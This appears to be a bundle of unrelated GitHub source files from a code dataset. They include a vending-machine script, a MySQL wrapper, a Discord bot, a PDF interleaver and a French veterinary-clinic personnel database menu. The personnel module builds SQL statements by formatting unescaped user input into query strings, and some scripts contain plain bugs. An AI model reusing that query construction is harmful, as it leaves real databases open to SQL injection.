640 * 3)\n# img = Image.open(PATH)\n# im = img.resize((96, 128))\n# i = np.array(im) / 255\n# print()\n# n_image = normalize(image)\n# show_image(n_image)\n\n# image = io.imread(PATH)\n# img = transform.resize(image, [480, 640], mode='reflect')\n# io.imsave(PATH, img)\n","repo_name":"oqewok/NeuralNetworks.TF","sub_path":"Net/image_proc.py","file_name":"image_proc.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21110687602","text":"def read_stock():\n \"\"\"\n txt파일을 읽어 coffee_list를 반환해준다.\n :return: coffee_list는 커피번호, 제품명, 가격, 제고로 이뤄진 2차원 배열이다.\n error는 오류가 있을 경우 오류메세지와 함께 반환되는 값이다.\n \"\"\"\n try:\n error = \"\"\n coffee_stock = open(\"coffee_stock.txt\", 'r', encoding=\"utf-8\")\n except FileNotFoundError as error:\n write_stock([])\n coffee_stock = open(\"coffee_stock.txt\", 'r', encoding=\"utf-8\")\n print(\"파일이 없습니다.\")\n coffee_list = []\n while True:\n line = coffee_stock.readline()\n if not line:\n break\n coffee_list.append(line.strip().split())\n coffee_stock.close()\n return coffee_list, error\n\n\ndef write_stock(coffee_list):\n \"\"\"\n 파일에 coffee_list를 쓴다.\n :param coffee_list를 받는다.\n \"\"\"\n # coffee_list가 비어있을 경우, 초기화를 사용한다.\n if not coffee_list:\n coffee_list = [[\"번호\", \"제품명\", \"가격\", \"재고\"]]\n coffee_stock = open(\"coffee_stock.txt\", 'w', encoding=\"utf-8\")\n for line_data in coffee_list:\n for data in line_data:\n coffee_stock.write(\"%s \" % data)\n coffee_stock.write(\"\\n\")\n coffee_stock.close()\n\n\ndef add_admin_goods_num(add_coffee):\n \"\"\"\n 물품의 개수를 변경한다.\n :param add_coffee: 변경한 커피의 번호\n \"\"\"\n goods_number = -1\n while goods_number < 0:\n goods_number = int(input(\"추가할 개수를 입력하세요: \"))\n coffee_list[add_coffee][len(coffee_list[0])-1] = str(int(coffee_list[add_coffee][len(coffee_list[0])-1]) + goods_number)\n\n\ndef add_admin_goods():\n \"\"\"\n 물품을 추가한다.\n \"\"\"\n goods_name = input(\"추가할 물품을 입력하세요.: \")\n goods_value = input(\"물품의 가격을 입력하세요.: \")\n goods_number = input(\"물품의 개수를 입력하세요.: \")\n coffee_list.append([str(len(coffee_list)), goods_name, goods_value, goods_number])\n\n\ndef del_admin_goods():\n pass\n\n\ndef admin_mode():\n coffee_num = 0\n while coffee_num != \"exit\":\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n print(\"=\"*30)\n choice = int(input(\"1. 물품의 개수를 추가\\n2. 물품을 추가\\n3. 물품을 삭제\\n4. 종료\\n선택해주세요.: \"))\n while choice <= 0 or choice > 4:\n choice = int(input(\"1. 물품의 개수를 추가\\n2. 물품을 추가\\n3. 물품을 삭제\\n4를 입력하면 종료됩니다.: \"))\n if choice == 1:\n while not(coffee_num in coffee_dict):\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n coffee_num = int(input(\"추가할 커피를 선택하세요.(exit는 종료): \"))\n add_admin_goods_num(coffee_num)\n coffee_num = 0\n write_stock(coffee_list)\n elif choice == 2:\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n add_admin_goods()\n write_stock(coffee_list)\n elif choice ==3:\n while not(coffee_num in coffee_dict):\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n coffee_num = int(input(\"추가할 커피를 선택하세요.(exit는 종료): \"))\n add_admin_goods_num(coffee_num)\n coffee_num = 0\n del_admin_goods()\n write_stock(coffee_list)\n elif choice == 4:\n return\n\n\n# 프로그램의 시작, 초기화\ncoffee_list, file_error = read_stock()\n\n# 첫번째 행의 오류 무시\n# coffee_dict: key=coffee_num, value=coffee_name\n# coffee_value: key=coffee_name, value=coffee_value\ncoffee_dict = {}\ncoffee_value = {}\nfor line in coffee_list:\n try:\n coffee_dict[int(line[0])] = line[1]\n coffee_value[line[1]] = int(line[2])\n except:\n pass\n\nif file_error != \"\":\n print(\"재고가 초기화되어 admin에 접속합니다.\")\n admin_mode()\n\nwhile True:\n money = input(\"돈을 넣으세요: \")\n if money == \"admin\":\n admin_mode()\n else:\n money = int(money)\n break\n\n# 100원 이하는 무조건 거스름 돈으로 돌려주면서 끝낸다.\nwhile money > 100:\n # 가격 및 고를 수 있는 커피 출력\n for i in range(1, len(coffee_dict)+1):\n print(\"%d. %s\" % (i, coffee_dict[i]), end=\" \")\n if i != len(coffee_dict):\n print(\"(%d원), \" % coffee_value[coffee_dict[i]], end=\"\")\n else:\n print(\"\")\n\n # 커피를 선택\n user_choice = 0\n while user_choice <= 0 or user_choice > len(coffee_dict):\n user_choice = int(input(\"마실 커피를 골라주세요: \"))\n if user_choice == len(coffee_dict):\n break\n money -= coffee_value[coffee_dict[user_choice]]\n print(\"%d원이 남았습니다.\" % money)\nprint(\"거스름돈 %d원을 돌려주었습니다.\" % money)\n","repo_name":"imn00133/PythonSeminar17","sub_path":"exercise/vending_machine/vending_machine.py","file_name":"vending_machine.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72631542170","text":"import mysql.connector as connector\nfrom util.auth import MY_SQL\n\nclass BancoDados:\n def __init__(self, usuario, senha, host, banco_dados):\n self.__usuario = usuario\n self.__senha = senha\n self.__host = host\n self.__banco_dados = banco_dados\n self.__cnx = None # Conexão\n \n def iniciar_conexao(self):\n try:\n self.__cnx = connector.connect(\n user = self.__usuario,\n password = self.__senha,\n host = self.__host,\n database = self.__banco_dados,\n auth_plugin = \"mysql_native_password\"\n\n )\n except:\n self.__cnx.close()\n\n def encerrar_conexao(self):\n self.__cnx.close()\n \n def query_get(self, query_base):\n resposta = None\n \n try:\n cursor = self.__cnx.cursor()\n\n cursor.execute(query_base)\n resposta = cursor.fetchall()\n except:\n resposta = None\n finally:\n cursor.close()\n \n return resposta\n \n def query_post(self, query_base):\n try:\n cursor = self.__cnx.cursor()\n \n cursor.execute(query_base)\n self.__cnx.commit()\n\n id_ultima_linha = cursor.lastrowid\n linhas_afetadas = cursor.rowcount\n except:\n linhas_afetadas = None\n finally:\n cursor.close()\n \n return True if linhas_afetadas or linhas_afetadas else False\n \n @staticmethod\n def informa_caminho_haloc():\n return BancoDados(\n \"root\",\n MY_SQL,\n \"localhost\",\n \"haloc\"\n )","repo_name":"JoaoVictorSou/haloc-cadastros-py","sub_path":"models/banco_dados.py","file_name":"banco_dados.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40238379143","text":"import logging\n\nfrom aiohttp import web\nfrom matplotlib import pyplot as plt\n\nfrom api.endpoints.routes import add_routes\nfrom utils import init_startup\n\n\nasync def init_app() -> web.Application:\n app = web.Application()\n logging.basicConfig(level=logging.INFO)\n\n add_routes(app)\n init_startup(app)\n\n return app\n\n\ndef main():\n plt.style.use(\"discord.mplstyle\")\n web.run_app(\n init_app(),\n access_log_format='%a %t \"%r\" %s %b %Tf \"%{Referer}i\" \"%{User-Agent}i\"',\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"angaz/discord-covid-19","sub_path":"api_main.py","file_name":"api_main.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17963898610","text":"# core file to handle circular imports\n\nimport json\nimport os\nfrom itertools import cycle\nfrom typing import *\n\nimport diskord\nfrom diskord.ext import tasks\nfrom diskord.utils import oauth_url\nfrom pydantic import BaseModel\n\nimport Bot\nfrom data import Database\nfrom utils.helpers import Context\n\n\ndef version():\n with open(\"./VERSION.txt\", \"r+\") as f:\n lines = f.read()\n return lines or \"3.4.1\"\n\n\ndef oauth(ctx: Context):\n url = oauth_url(\n client_id=ctx.me.id,\n permissions=diskord.Permissions.all(),\n guild=ctx.guild,\n redirect_uri=\"https://discord.gg/5nzgEWSnEG\", # Join btw\n )\n return url\n\n\n@tasks.loop(seconds=30)\nasync def change_status(bot):\n \"\"\"Test\"\"\"\n status = cycle(\n [\n \"Banning Rule Breakers\",\n \"Follow the rules\",\n \"Get Gud lol\",\n \"Sub to DCR\",\n \"Give Marcus Boost Nitro\",\n f\"DM {bot.config.ME} for a custom bot\",\n \"It took Marcus 10 Days to Make me\",\n \"Fun Fact: Marcus was born on June 10th\",\n f\"Helping people\",\n ]\n )\n await bot.wait_until_ready()\n await bot.change_presence(\n activity=diskord.Activity(\n type=diskord.ActivityType.watching, name=f\"{next(status)} | h!help\"\n )\n )\n","repo_name":"MarzaElise/Hutch-Bot","sub_path":"BaseFile.py","file_name":"BaseFile.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"71935967451","text":"import string\n\nfnand = input('Enter file: ')\ntry:\n lines = open(fnand)\nexcept:\n print('File cannot be opened')\n exit()\n\ncounts = dict()\ntotals = 0\naverage = 0\n\nfor line in lines:\n #line = line.translate(line.maketrans('', '', string.punctuation + string.digits))\n line = line.rstrip()\n #line = line.lower()\n line = line.split()\n for word in line:\n for letter in word:\n totals += 1\n if letter not in counts:\n counts[letter] = 1\n else:\n counts[letter] += 1\n\nletters = list()\n\nfor key, val in list(counts.items()):\n letters.append((key, val))\n\nletters.sort()\nfor key, val in letters:\n average = round(val / totals * 100, 2)\n print(key, 'shows up', average, 'percent or', val, 'times in', fnand)\nprint('Iterated though', totals, 'letters.')\n","repo_name":"cabbott008/python","sub_path":"ex10.3.py","file_name":"ex10.3.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6633535308","text":"list1=['piyush','abc','df']\r\nlist2=[]\r\ndict1={}\r\nfor str in list1:\r\n list2.append(len(str))\r\n dict1[str]=len(str)\r\nprint(max(list2))\r\nfor word,lenght in dict1.items():\r\n if(max(list2)):\r\n print(word,length)","repo_name":"PiyushWaghmare/Python-Cpp-Practicals","sub_path":"longest.py","file_name":"longest.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17420238849","text":"import subprocess\nfrom timeit import default_timer as timer\nfrom random import choice\n\nout = {}\n\ncmds = {\n \"orig\": [\"python2\", \"nw_align_original.py\"],\n \"orig3\": [\"python\", \"nw_align_original.py\"],\n \"numpy\": [\"python\", \"nw_align.py\", \"numpy\"],\n \"numba\": [\"python\", \"nw_align.py\", \"numba\"],\n \"torch\": [\"python\", \"nw_align.py\", \"torch\"],\n \"torchcuda\": [\"python\", \"nw_align.py\", \"torchcuda\"],\n \"cupy\": [\"python\", \"nw_align.py\", \"cupy\"],\n \"nimc\": [\"./nw_align\"],\n \"nimjs\": [\"node\", \"nimcache/nw_align.js\"],\n \"js\": [\"node\", \"nw_align.js\"]\n }\n\nNs = [500,1000,1500,2000,2500,3000,5000]\nmaxlen = {\"cupy\":1000, \"torchcuda\":5000}\n\nout = {}\nout[\"out\"] = {k:{} for k in cmds}\nout[\"time\"] = {k:{} for k in cmds}\n\nfor N in Ns:\n seq1 = ''.join(choice(\"ACGT\") for _ in range(N))\n seq2 = ''.join(choice(\"ACGT\") for _ in range(N))\n\n for k, cmd in cmds.items():\n if k in maxlen and N > maxlen[k]: continue\n\n start = timer()\n out[\"out\"][k][N] = subprocess.check_output(cmd + [seq1, seq2]).decode()\n end = timer()\n out[\"time\"][k][N] = end - start\n\nfor N in Ns:\n outs = {k: out[\"out\"][k][N] for k in cmds}\n assert len(set(outs.values())) == 1, \"not the same output from every method {}\".format(set(outs.values()))\n # DEBUG print(outs)\n\nprint(out[\"time\"])\n","repo_name":"hgbrian/nw_align","sub_path":"test_nw_align.py","file_name":"test_nw_align.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"31392416268","text":"# This Python file uses the following encoding: utf-8\n\n# if__name__ == \"__main__\":\n# pass\n\nimport sys\nfrom PySide2.QtWidgets import QApplication, QPushButton\nfrom PySide2.QtCore import Slot\n'''\nNOTE: The @Slot() is a decorator that identifies a function as a slot.\nAlways use to avoid unexpected behavior\n\n'''\n\n# Greetings\n@Slot()\ndef say_hello():\n print(\"Button clicked, Hello!\")\n\n\n# Create the Qt application\napp = QApplication(sys.argv)\n\n# Create a Button\nbutton = QPushButton(\"Click me\")\n# Connect the button to the function\nbutton.clicked.connect(say_hello)\n# Show the button\nbutton.show()\n\n# Run the main Qt loop\napp.exec_()\n","repo_name":"edalvaren/qt4python_training","sub_path":"signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6847600217","text":"import os\nimport logging\n\nfrom ewoc_dag.eo_prd_id.s1_prd_id import S1PrdIdInfo\n\nlogger = logging.getLogger(__name__)\n\ndef l2a_to_ard(product_id, work_dir):\n \"\"\"\n Convert an L2A product into EWoC ARD format\n :param l2a_folder: L2A SAFE folder\n :param work_dir: Output directory\n \"\"\"\n bands = {\n \"B02\": 10,\n \"B03\": 10,\n \"B04\": 10,\n \"B08\": 10,\n \"B05\": 20,\n \"B06\": 20,\n \"B07\": 20,\n \"B11\": 20,\n \"B12\": 20,\n \"SCL\": 20,\n }\n # Prepare ewoc folder name\n platform = product_id.split(\"_\")[0]\n processing_level = product_id.split(\"_\")[1]\n date = product_id.split(\"_\")[2]\n year = date[:4]\n # Get tile id , remove the T in the beginning\n tile_id = product_id.split(\"_\")[5][1:]\n atcor_algo = \"L2A\"\n unique_id = \"\".join(product_id.split(\"_\")[3:6])\n folder_st = os.path.join(\n work_dir,\n \"OPTICAL\",\n tile_id[:2],\n tile_id[2],\n tile_id[3:],\n year,\n date.split(\"T\")[0],\n )\n dir_name = f\"{platform}_{processing_level}_{date}_{unique_id}_{tile_id}\"\n\n # Convert bands and SCL\n raster_fn_list = []\n for band in bands:\n out_name = f\"{platform}_{atcor_algo}_{date}_{unique_id}_{tile_id}_{band}.tif\"\n raster_fn = os.path.join(folder_st, dir_name, out_name)\n raster_fn_list.append(raster_fn)\n\n return raster_fn_list\n\n\ndef l8_to_ard(key,s2_tile,out_dir=None):\n product_id = os.path.split(key)[-1]\n platform = product_id.split('_')[0]\n processing_level = product_id.split('_')[1]\n date = product_id.split('_')[3]\n year = date[:4]\n # Get tile id , remove the T in the beginning\n tile_id = s2_tile\n unique_id = f\"{product_id.split('_')[2]}{product_id.split('_')[5]}{product_id.split('_')[6]}\"\n folder_st = os.path.join('TIR', tile_id[:2], tile_id[2], tile_id[3:], year,date.split('T')[0])\n dir_name = f\"{platform}_{processing_level}_{date}_{unique_id}_{tile_id}\"\n out_name = f\"{platform}_{processing_level}_{date}_{unique_id}_{tile_id}\"\n raster_fn = os.path.join(folder_st, dir_name, out_name)\n if out_dir is not None:\n tmp = os.path.join(out_dir, folder_st, dir_name)\n if not os.path.exists(tmp):\n os.makedirs(tmp)\n return raster_fn\n\n\ndef to_ewoc_s1_ard(out_dirpath,\n s1_prd_info,\n s2_tile_id):\n s1_prd_info = S1PrdIdInfo(s1_prd_info) # Transformation to a S1 EO product\n orbit_direction = 'DES' # TODO retrieve from GDAL MTD of the output s1_process file or from mtd of the input product\n relative_orbit = 'TODO' # TODO retrieve from GDAL MTD of the output s1_process file or from mtd of the input product\n\n ewoc_output_dirname_elt = [s1_prd_info.mission_id,\n s1_prd_info.start_time.strftime(s1_prd_info.FORMAT_DATETIME),\n orbit_direction,\n relative_orbit,\n s1_prd_info.absolute_orbit_number + s1_prd_info.mission_datatake_id + s1_prd_info.product_unique_id,\n s2_tile_id]\n ewoc_output_dirname = '_'.join(ewoc_output_dirname_elt)\n ewoc_output_dirpath = out_dirpath / 'SAR' / s2_tile_id[:2] / s2_tile_id[2] / s2_tile_id[3:] / \\\n str(s1_prd_info.start_time.year) / s1_prd_info.start_time.date().strftime(\n '%Y%m%d') / ewoc_output_dirname\n logger.debug('Create output directory: %s', ewoc_output_dirpath)\n ewoc_output_dirpath.mkdir(exist_ok=True, parents=True)\n\n calibration_type = 'SIGMA0' # TODO retrieve from GDAL MTD of the output s1_process file or from parameters\n output_file_ext = '.tif'\n ewoc_output_filename_elt = ewoc_output_dirname_elt + [calibration_type]\n ewoc_output_filename_vv = '_'.join(ewoc_output_filename_elt + ['VV']) + output_file_ext\n ewoc_output_filepath_vv = ewoc_output_dirpath / ewoc_output_filename_vv\n logger.debug('Output VV filepath: %s', ewoc_output_filepath_vv)\n ewoc_output_filename_vh = '_'.join(ewoc_output_filename_elt + ['VH']) + output_file_ext\n ewoc_output_filepath_vh = ewoc_output_dirpath / ewoc_output_filename_vh\n logger.debug('Output VH filepath: %s', ewoc_output_filepath_vh)\n\n return ewoc_output_filepath_vv, ewoc_output_filepath_vh\n","repo_name":"WorldCereal/ewoc_dataship","sub_path":"src/ewoc_dag/legacy/pid_to_ard.py","file_name":"pid_to_ard.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26413124140","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 6. 텍스트\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\n# matplotlib.rcParams['font.family'] = 'Apple Gothic' # Mac용 \nmatplotlib.rcParams['font.size'] = 15 # 글자크기\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\n\n# In[2]:\n\n\nx = [1,2,3]\ny = [2,4,8]\n\n\n# In[3]:\n\n\nplt.plot(x,y)\n\n\n# In[12]:\n\n\nplt.plot(x,y, marker ='o')\n\nt = ['1', '2', '3']\n\nfor idx, txt in enumerate(t):\n plt.text(x[idx],y[idx] + 0.2, txt, ha='center', color = 'b') #x좌표와 y좌표에 txt 넣어주고 # x좌표(수평정렬) 가운데정렬\n \n # enumerate() : 인덱스와 값에 접근 \n # enumerate(t) : t데이터의 값을 찍어준다.\n # 마커와 겹치지 않게 +0.2\n # ha: horizental align \n # plt.text : 그래프 마커에 text넣어준다\n\n","repo_name":"Choi-09/Python","sub_path":"K-digital/Chapter4.분석패키지/Matplotlib/06.텍스트.py","file_name":"06.텍스트.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35262920252","text":"#!/usr/local/bin/python3\nimport psycopg2\nimport os\nimport datetime\nimport json \n\ndef personnel_menu(conn):\n choice = 0\n continu = True\n while(continu):\n os.system(\"clear\")\n print(\"\\n\\t\\tGestion du personnel\")\n print(\"\\n\\t### Que voulez-vous faire ? ###\")\n print(\"\\t0\\tRevenir au menu principal\\n\")\n print(\"\\t1\\tVoir les membres du personnel\")\n print(\"\\t2\\tAjouter un membre du personnel\")\n print(\"\\t3\\tModifier un membre du personnel\")\n print(\"\\t4\\tRechercher un personnel par son nom ou prénom\")\n print(\"\\t5\\tVoir le détail de la fiche d'un membre du personnel\")\n choice = int(input(\"\\n> \"))\n os.system(\"clear\")\n\n if(choice == 0):\n continu = False\n print(\"\\n\\tRetour au menu\")\n elif(choice == 1):\n voir_membres_personnel(conn)\n elif(choice==2):\n ajouter_membre_personnel(conn)\n elif(choice==3):\n modifier_membre_personnel(conn)\n elif(choice==4):\n rechercher_membre_personnel(conn)\n elif(choice==5):\n detail_membre_personnel(conn)\n\n\ndef voir_membres_personnel(conn):\n cur = conn.cursor()\n sql = \"SELECT * FROM PERSONNEL ORDER BY ID ASC;\"\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\tVoici les membres du personnel :\")\n print(\"\\t#ID\")\n for raw in res:\n print(\"\\t#%s\\tPOSTE : %s\\t%s %s\" % (raw[0], raw[6], raw[1], raw[2]))\n input()\n cur.close()\n\ndef ajouter_membre_personnel(conn): \n cur = conn.cursor()\n print(\"\\tInsertion d'un nouveau membre du personnel :\")\n nom = quote(input(\"\\tIndiquez le nom\\n\\t> \"))\n prenom = quote(input(\"\\tIndiquez le prénom\\n\\t> \"))\n adresse = quote(input(\"\\tIndiquez l'adresse\\n\\t> \"))\n numero_tel = quote(input(\"\\tIndiquez le numéro de téléphone\\n\\t> \")) \n annee_bd = int(input(\"\\tIndiquez l'annee de naissance\\n\\t> \"))\n mois_bd = int(input(\"\\tIndiquez le mois de naissance\\n\\t> \"))\n jour_bd= int(input(\"\\tIndiquez le jour de naissance\\n\\t> \"))\n date_de_naissance= quote(datetime.date(annee_bd, mois_bd, jour_bd))\n poste = quote(input(\"\\tIndiquez le poste (Veto, Assistant)\\n\\t> \"))\n specialites = []\n specialite = \"aa\"\n while specialite != \"\":\n print(\"\\tSpecialites possibles :\")\n sql = \"SELECT * FROM ESPECE ORDER BY ESPECE ASC\"\n cur.execute(sql)\n results = cur.fetchall()\n for result in results:\n print(\"\\t- %s\" % (result[0]))\n specialite = str(input(\"\\n\\tIndiquez une spécialité à ajouter ('entrée' quand fini)\\n\\t> \"))\n if(specialite!=\"\"):\n sql = \"SELECT * FROM ESPECE WHERE ESPECE=%s;\" % (quote(specialite))\n cur.execute(sql)\n if(cur.fetchall()):\n specialites.append(specialite)\n print(\"\\tLa spécialité a été ajoutée\")\n else:\n print(\"\\t! La spécialité indiquée n'existe pas\")\n try: \n sql = \"INSERT INTO PERSONNEL (Nom, Prenom, DateDeNaissance, Adresse, NumeroTel, Poste, Specialites) VALUES (%s, %s, %s, %s, %s, %s, '{\\\"specialites\\\" : %s}');\" % (nom, prenom, date_de_naissance, adresse, numero_tel, poste, json.dumps(specialites))\n cur.execute(sql)\n conn.commit()\n print(\"\\tCommande exécutée\")\n except psycopg2.IntegrityError as e: \n conn.rollback()\n print(e)\n cur.close()\n\ndef modifier_membre_personnel(conn):\n print(\"\\tVeuillez indiquer l'ID du personnel à modifier :\")\n id = int(input(\"\\n> \"))\n print(\"\\n\\tVeuillez indiquer l'information que vous voulez modifier :\")\n print(\"\\tnom\")\n print(\"\\tprenom\")\n print(\"\\tadresse\")\n print(\"\\tnumeroTel\")\n print(\"\\tposte\")\n print(\"\\tspecialites\")\n column = str(input(\"\\n> \"))\n cur = conn.cursor()\n if(column==\"specialites\"):\n specialites = []\n specialite = \"aa\"\n while specialite != \"\":\n print(\"\\tSpecialites possibles :\")\n sql = \"SELECT * FROM ESPECE ORDER BY ESPECE ASC\"\n cur.execute(sql)\n results = cur.fetchall()\n for result in results:\n print(\"\\t- %s\" % (result[0]))\n specialite = str(input(\"\\n\\tIndiquez une spécialité à ajouter ('entrée' quand fini)\\n\\t> \"))\n if(specialite!=\"\"):\n sql = \"SELECT * FROM ESPECE WHERE ESPECE=%s;\" % (quote(specialite))\n cur.execute(sql)\n if(cur.fetchall()):\n specialites.append(specialite)\n print(\"\\tLa spécialité a été ajoutée\")\n else:\n print(\"\\t! La spécialité indiquée n'existe pas\")\n value = quote(\"{\\\"specialites\\\" : %s}\" % (json.dumps(specialites)))\n else:\n print(\"\\n\\tVeuillez indiquer la nouvelle valeur :\")\n value = quote(input(\"\\n> \"))\n try:\n sql = \"UPDATE PERSONNEL SET %s = %s WHERE ID=%i;\" % (column,value,id)\n cur.execute(sql)\n print(\"\\tCommande exécutée\")\n conn.commit()\n cur.close()\n except psycopg2.Error:\n conn.rollback()\n print(\"Erreur lors de la mise à jour, merci de réessayer.\")\n\ndef rechercher_membre_personnel(conn):\n print(\"\\tVeuillez indiquer le nom ou prénom du personnel :\")\n string = quote(input(\"\\n> \"))\n cur = conn.cursor()\n sql = \"SELECT * FROM PERSONNEL WHERE strpos(nom,%s)>0 OR strpos(prenom,%s)>0 ORDER BY ID ASC;\" % (string,string)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\tVoici les membres du personnel trouvés pour votre requête :\")\n print(\"\\t#ID\")\n for raw in res:\n print(\"\\t#%s\\tPOSTE : %s\\t%s %s\" % (raw[0], raw[6], raw[1], raw[2]))\n input()\n cur.close()\n\ndef detail_membre_personnel(conn):\n print(\"\\tVeuillez indiquer l'ID du membre du personnel :\")\n ID = int(input(\"\\n> \"))\n cur = conn.cursor()\n sql = \"SELECT * FROM PERSONNEL WHERE id=%i;\" % (ID)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\t#ID : %i\" % (ID))\n for raw in res:\n print(\"\\t%s %s (né le %s)\" % (raw[2],raw[1],raw[3]))\n print(\"\\tPoste : %s\" % (raw[6]))\n print(\"\\tTelephone : %s\" % raw[5])\n print(\"\\tAdresse : %s\" % raw[4])\n try:\n print(\"\\tSpecialités :\")\n for specialite in raw[7][\"specialites\"]:\n print(\"\\t - %s\" % (specialite))\n except:\n pass\n\n sql = \"SELECT * FROM SOIGNANT_ACTUEL WHERE ID_Personnel=%i\" % (ID)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\n\\tPatients actuels\")\n for raw in res:\n print(\"\\t - #%s\\t%s (depuis le %s)\" % (raw[1],raw[0],raw[5]))\n \n sql = \"SELECT * FROM SOIGNANT_PASSE WHERE ID_Personnel=%i\" % (ID)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\n\\tAnciens patients\")\n for raw in res:\n print(\"\\t - #%s\\t%s (du %s au %s)\" % (raw[1],raw[0],raw[5],raw[6]))\n print('\\n')\n input()\n cur.close()\n\ndef quote(s):\n if s:\n return '\\'%s\\'' % s\n else:\n return 'NULL'\n","repo_name":"StephaneBranly/NF18-Database","sub_path":"personnel.py","file_name":"personnel.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15603999361","text":"\"\"\"\"------------------------------------------------------------------\nPDF Interweaver\n(c) Jeff Kessler, 2019-06-15-1710\n\n2023-08-13-0855-JK Fix for unequal page numbers\n Distinct filenames\n------------------------------------------------------------------\"\"\"\n\nimport PyPDF2\nimport time\n\n#input(\"Filepath 1: \")\n\ndef pdf_merger(original_fp, new_fp, watermark, mark1, mark2):\n\n # Open PDF Files\n a = PyPDF2.PdfFileReader(original_fp)\n b = PyPDF2.PdfFileReader(new_fp)\n\n\n # Open Watermark files\n if watermark:\n watermark_pdf = PyPDF2.PdfFileReader(watermark)\n watermark = watermark_pdf.getPage(0)\n\n if mark1:\n mark1_pdf = PyPDF2.PdfFileReader(mark1)\n mark1 = mark1_pdf.getPage(0)\n\n if mark2:\n mark2_pdf = PyPDF2.PdfFileReader(mark2)\n mark2 = mark2_pdf.getPage(0)\n\n\n # Determine common page count\n common_page_count = min(a.numPages, b.numPages)\n\n\n # Establish merged PDF\n merged = PyPDF2.PdfFileWriter()\n\n\n # Iteratively add common pages\n for pagenum in range(common_page_count):\n pagea = a.getPage(pagenum)\n pageb = b.getPage(pagenum)\n if mark1:\n pagea.mergePage(mark1)\n if mark2:\n pageb.mergePage(mark2)\n if watermark:\n pagea.mergePage(watermark)\n pageb.mergePage(watermark)\n merged.addPage(pagea)\n merged.addPage(pageb)\n\n # Add Unique Pages\n for pagenum in range(common_page_count, a.numPages):\n pagea = a.getPage(pagenum)\n if mark1:\n pagea.mergePage(mark1)\n if watermark:\n pagea.mergePage(watermark)\n pageb.mergePage(watermark)\n merged.addPage(pagea)\n merged.addBlankPage()\n\n for pagenum in range(common_page_count, b.numPages):\n pageb = b.getPage(pagenum)\n if mark2:\n pageb.mergePage(mark2)\n if watermark:\n pagea.mergePage(watermark)\n pageb.mergePage(watermark)\n merged.addBlankPage()\n merged.addPage(pageb)\n\n\n # Save Merged PDF\n with open(f'Merged PDF Generated {time.strftime(\"%Y-%m-%d-%H%M%S\")}.pdf', \"wb\") as file:\n merged.write(file)\n\n\nif __name__==\"__main__\":\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('fp1', type=str, help='Original filepath')\n parser.add_argument('fp2', type=str, help='New filepath')\n parser.add_argument('--wm', \"--w\", help=\"Filepath of PDF watermark to apply to both pages\")\n parser.add_argument('--m1', \"--wm1\", \"--mark1\", help=\"Filepath of PDF watermark to apply to the original PDF\")\n parser.add_argument('--m2', \"--wm2\", \"--mark2\", help=\"Filepath of PDF watermark to apply to the new PDF\")\n args = parser.parse_args()\n pdf_merger(args.fp1, args.fp2, args.wm, args.m1, args.m2)\n","repo_name":"jeffkess/PDF_Interweaver","sub_path":"pdf_interweaver.py","file_name":"pdf_interweaver.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21368359918","text":"# -*- coding: utf-8 -*-\n__author__ = 'lnx'\nimport netCDF4\nimport numpy as np\n\ndef geo_idx(dd, dd_array):\n \"\"\"\n search for nearest decimal degree in an array of decimal degrees and return the index.\n np.argmin returns the indices of minium value along an axis.\n so subtract dd from all values in dd_array, take absolute value and find index of minium.\n \"\"\"\n geo_idx = (np.abs(dd_array - dd)).argmin()\n return geo_idx\n\ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx], idx\n\ndef find_nearest_xy(array1, value1, array2, value2):\n array1 = np.asarray(array1)\n array2 = 